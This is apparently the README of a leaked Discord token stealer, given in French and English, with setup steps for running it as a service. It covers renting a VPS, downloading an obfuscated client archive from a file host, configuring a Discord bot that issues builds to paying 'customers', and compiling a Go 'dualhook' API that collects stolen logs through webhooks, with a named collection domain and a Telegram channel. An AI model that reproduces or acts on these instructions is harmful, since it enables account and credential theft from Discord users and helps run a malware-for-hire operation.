Hey everyone i leak my own discord token stealer since 2019-2023.
Im leaving discord and stop everything.
Be fun with the source code every instructions are here.
Please tag the github if you use it i need star :c


french

Utilise un Vps avec Ubuntu 20.04 (je préfère https://rdp.sh/ c'est 10$ par mois et en plus c'est proche c'est a Amsterdam)

- sudo apt install zip
- sudo apt install unzip

Upload le zip
extrait le zip (si le repertoire de fichier ne se nomme pas Stealer renomme le 

Download Node v18.16.1:
- sudo apt update
- sudo apt install curl
- curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash -
- sudo apt install -y nodejs


Setup the src on your vps

- sudo npm install
- sudo npm i pm2 -g
- sudo npm install -g pkg

Unzip node_modules.zip dans Stealer/bot
Install https://gofile.io/d/yq20fO et place les dans ClientObf and unzip

Changer vos directories dans Stealer/Bot/index.js et mettez les nouvelles (ex: /home/vshell/ClientObf/link.txt votre nom de vps est lolita, alors cela fera /home/lolita/ClientObf/link.txt si c'est root votre user alors cela sera /root/a/ClientObf/link.txt )

Pour modifier le nom des logs allez dans Stealer/ClientObf/Utils dans discord.js Modifier les émojis et le nom et dans stats.js c'est de même.

Pour modifier le nom des embeds de build allez dans Stealer/Bot et dans index.js vous pouvez renammes le bot ^^
Ajouter dans Stealer/Bot/index.js:
token: "your token"
client id: "discord developper portal (app id)"
guildid: "your guild id"
verified roles: "customers roles"

/build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot

pour build une api (recevoir les logs et avoir un dualhook)
téléchargher golang
il faut que vous aller sur votre bureau windows que vous prenez le dossier "Api"
vous allez dedans vous cliquer sur main.go et vous modifier le dualwebhook avec le votre.
enregistrer et aller sur votre barre de recherche en haut et faite cmd
taper ceci:
set GOOS=linux
go build -ldflags "-s -w" main.go
prenez le fichier main qui a été build et mettez le sur votre vps dans le dossier "Api"
faites cd Api
chmod 777 main
screen -dmS Api ./main
maitenant faites ctrl + A + D et votre Api est en ligne vous avez juste a allez dans build.js dans "ClientObf" et modifier l'encryptedWebhook remplacer api.nftroulette.store par votre ip de vps et voila !

Ne pas edit la config de build.js sinon plus rien ne marchera

official 1336 Channel
https://t.me/St34ler


-----------------------------------------------------------------------
English


Use Vps with Ubuntu 20.04 (i prefer https://rdp.sh/ 10$ server per month in amsterdam)

- sudo apt install zip
- sudo apt install unzip

Download zip
extracts the zip (if the file directory is not named Stealer renames the

Download Node v18.16.1:
- sudo apt update
- sudo apt install curl
- curl -sL https://deb.nodesource.com/setup_18.x | sudo -E bash -
- sudo apt install -y nodejs


Setup the src on your vps

Unzip node_modules.zip in Stealer/bot
Install https://gofile.io/d/yq20fO and put him on ClientObf and unzip

- sudo npm install
- sudo npm i pm2 -g
- sudo npm install -g pkg

Change your directories in Stealer/Bot/index.js and put the new ones (ex: /home/vshell/ClientObf/link.txt your vps name is lolita, then this will do /home/lolita/ClientObf/link.txt if your user are root  /root/a/ClientObf/link.txt )

To modify the name of the logs go to Stealer/ClientObf/Utils in discord.js Modify emojis and name and in stats.js it's the same.

To modify the name of the build embeds go to Stealer/Bot and in index.js you can rename the bot ^^

Add in Stealer/Bot/index.js:
token: "your token"
client id: "discord developper portal (app id)"
guildid: "your guild id"
verified roles: "customers roles"

/build icon: none (icon not work or crash bot) webhook_url: your webhook name: yourname with no space or crash bot

To build an API (receive logs and have a dualhook)
Download Golang
you need to go to your windows desktop as you take the "Api" folder
In this you will click on main.go and you will change the dualwebhook with yours.
Save and go to your search bar at the top and do cmd
Type this:
set GOOS=linux
go build -ldflags "-s -w" main.go
Take the main file that was built and put it on your VPS in the "Api" folder
make cd Api
CHMOD 777 Main
screen -dmS API ./main
Now do ctrl + A + D and your API is up and running, you just have to go to build.js in "ClientObf" and modify the encryptedWebhook, replace api.nftroulette.store with your vps ip and that done!


don't edit build.js or nothing will be work

official 1336 Channel
https://t.me/St34ler
